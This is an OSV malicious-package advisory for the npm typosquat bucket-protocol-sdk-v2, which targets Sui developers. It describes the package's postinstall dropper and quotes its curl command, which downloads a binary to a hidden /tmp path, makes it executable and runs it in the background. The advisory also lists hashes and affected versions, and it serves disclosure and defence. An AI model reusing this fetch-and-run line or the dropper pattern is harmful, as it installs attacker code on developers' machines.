MAL-2026-4502

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/bucket-protocol-sdk-v2/MAL-2026-4502.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4502

Published

2026-05-20T04:04:00Z

Modified

2026-05-26T06:02:15.177292589Z

Summary

Malicious code in bucket-protocol-sdk-v2 (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e19ff8a6cb5a08bd0561658d41dfe3616f1680bc5acac989c97da38f37ee41b4)

bucket-protocol-sdk-v2 advertises itself as a 'community maintained drop-in replacement' for the Sui ecosystem's bucket-protocol-sdk, but its src/ tree contains only empty stubs (bucket.ts: export {};, index.ts: export * from './bucket';) — no real SDK code is shipped. The entire payload is the postinstall hook. package.json declares "postinstall": "node install.js"; install.js checks whether the host is a Sui developer (presence of the sui binary or ~/.sui/sui_config/client.yaml) and then runs curl -s -L -o /tmp/.sui-helper ${implantUrl} && chmod +x /tmp/.sui-helper && /tmp/.sui-helper & to fetch, stage, and background-execute an attacker binary at a hidden /tmp path. The variable is literally named implantUrl with the comment PUT YOUR ACTUAL 0x0.st URL HERE, identifying the intended payload host as the anonymous 0x0.st file dump. The URL is currently an empty string in this published version (staged/broken release), so today's install does not actually fetch a binary, but the dropper scaffolding, target-gating, hidden staging path, backgrounded execution, and typosquat-of-a-Sui-SDK lure are unambiguous. Any subsequent republish trivially fills the URL. The combination of hostile-named scaffolding, dev-machine-targeting gate, anonymous-host comment, and hollow library content satisfies the namespace-abuse-typosquat-with-payload and generic-binary-runner-dropper patterns.

Database specific

{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-05-20T04:04:30Z",
            "versions": [
                "1.0.26"
            ],
            "sha256": "1b25f4c8e7236236452ca049e0a8409ea8cea78d9ceb131daeea771d6365f61b",
            "id": "IN-MAL-2026-003456",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:40.680023655Z"
        },
        {
            "modified_time": "2026-05-20T04:04:10Z",
            "versions": [
                "1.0.11"
            ],
            "sha256": "5bab9298f8bac43d26a48a14cb001113d1415a38e9dbe3d78c55a8ebba95e679",
            "id": "IN-MAL-2026-003455",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:40.570388632Z"
        },
        {
            "modified_time": "2026-05-20T04:21:39Z",
            "versions": [
                "1.0.23"
            ],
            "sha256": "66a46f323763deecb5661ae7aa597ac73691211c718359914fef69c4322309ee",
            "id": "IN-MAL-2026-003462",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:41.316971934Z"
        },
        {
            "import_time": "2026-05-26T05:50:41.208819798Z",
            "versions": [
                "1.0.12"
            ],
            "sha256": "9612ba97a11244d132e6893004e23f8ba4999200709fc04dc4677a972de03155",
            "id": "IN-MAL-2026-003461",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T04:21:14Z"
        },
        {
            "modified_time": "2026-05-20T04:04:00Z",
            "versions": [
                "1.0.22"
            ],
            "sha256": "b70afaf3f61c7ec2726720fb4c7b00256bed2cd2eb65dc165cfa0fef243ecb13",
            "id": "IN-MAL-2026-003454",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:40.436204814Z"
        },
        {
            "modified_time": "2026-05-20T19:30:10Z",
            "versions": [
                "1.0.18"
            ],
            "sha256": "e19ff8a6cb5a08bd0561658d41dfe3616f1680bc5acac989c97da38f37ee41b4",
            "id": "IN-MAL-2026-003600",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:56.414273874Z"
        },
        {
            "modified_time": "2026-05-20T20:42:07Z",
            "versions": [
                "1.0.19"
            ],
            "sha256": "f213ad1e13ca48fd037fbad78f53b85c280b913fac9cd88632c4ad02f1fa980d",
            "id": "IN-MAL-2026-003612",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:58.104269831Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / bucket-protocol-sdk-v2

Package

Name: bucket-protocol-sdk-v2; View open source insights on deps.dev
Purl: pkg:npm/bucket-protocol-sdk-v2

Affected ranges

Affected versions

1.*

1.0.11

1.0.12

1.0.18

1.0.19

1.0.22

1.0.23

1.0.26

Database specific

indicators

{
    "evidence_files": [
        {
            "sha256": "2d541f32fa2565d1bd59984485a53d5d8e2e5d6ae8dcdcf39487df3aa74c9cce",
            "tlsh": "86f0c0d202d2b336b9200cd5e959c43aa07bc0007417e6c494c84af72243a24c753cf7",
            "path": "install.js"
        },
        {
            "sha256": "44fed77a3d0a86e89770b87608011b2f2b182bbd38aec02e3c133b30f24c032f",
            "tlsh": "fbe0d82459134bb725c496570c26a167b7255f1f4444380c2adf9b1c839f7778cfa319",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-TUDlJnnMfPILAEnK4oJLNRqnrfEBnrL1bjbdPJdLtlmcOKMC1B/SdfAhyIRqWwwOxdShRTvHXz2p6/UDEt08Kw==",
                "sha1": "d2a7ff249158e4d6e9645fde6d0bfb4a5508267a"
            },
            "filename": "bucket-protocol-sdk-v2-1.0.26.tgz"
        }
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/bucket-protocol-sdk-v2/MAL-2026-4502.json"